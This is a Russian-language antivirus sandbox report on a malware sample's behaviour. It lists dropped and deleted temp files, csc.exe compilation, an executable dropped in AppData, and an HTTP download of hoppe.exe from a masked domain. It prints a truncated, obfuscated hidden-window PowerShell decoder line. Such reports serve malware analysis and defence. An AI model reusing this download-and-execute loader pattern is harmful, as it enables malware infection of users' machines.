Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function b126f {param($xa63a1a)$ye8b33='w759bf6';$w2cbd9c='';for ($i=0; $i -lt $xa63a1a.length;$i+=2){$f9e81=[convert]::ToByte($xa63a1a.Substring($i,2),16);$w2cbd9c+=[char...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\d4lpnmwr.0.cs
- %TEMP%\d4lpnmwr.cmdline
- %TEMP%\d4lpnmwr.out
- %TEMP%\csc184e.tmp
- %TEMP%\res184f.tmp
- %TEMP%\d4lpnmwr.dll
- %APPDATA%\lce9f3.exe
Удаляет следующие файлы
- %TEMP%\res184f.tmp
- %TEMP%\csc184e.tmp
- %TEMP%\d4lpnmwr.out
- %TEMP%\d4lpnmwr.0.cs
- %TEMP%\d4lpnmwr.cmdline
- %TEMP%\d4lpnmwr.dll
- %TEMP%\d4lpnmwr.pdb
Сетевая активность
TCP
Запросы HTTP GET
- http://aw####ngpickup.com/image/hoppe.exe
UDP
- DNS ASK aw####ngpickup.com
- DNS ASK pa###bin.com
Другое
Создает и запускает на исполнение
- '%APPDATA%\lce9f3.exe'
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES184F.tmp" "%TEMP%\CSC184E.tmp"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\d4lpnmwr.cmdline"' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\d4lpnmwr.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES184F.tmp" "%TEMP%\CSC184E.tmp"
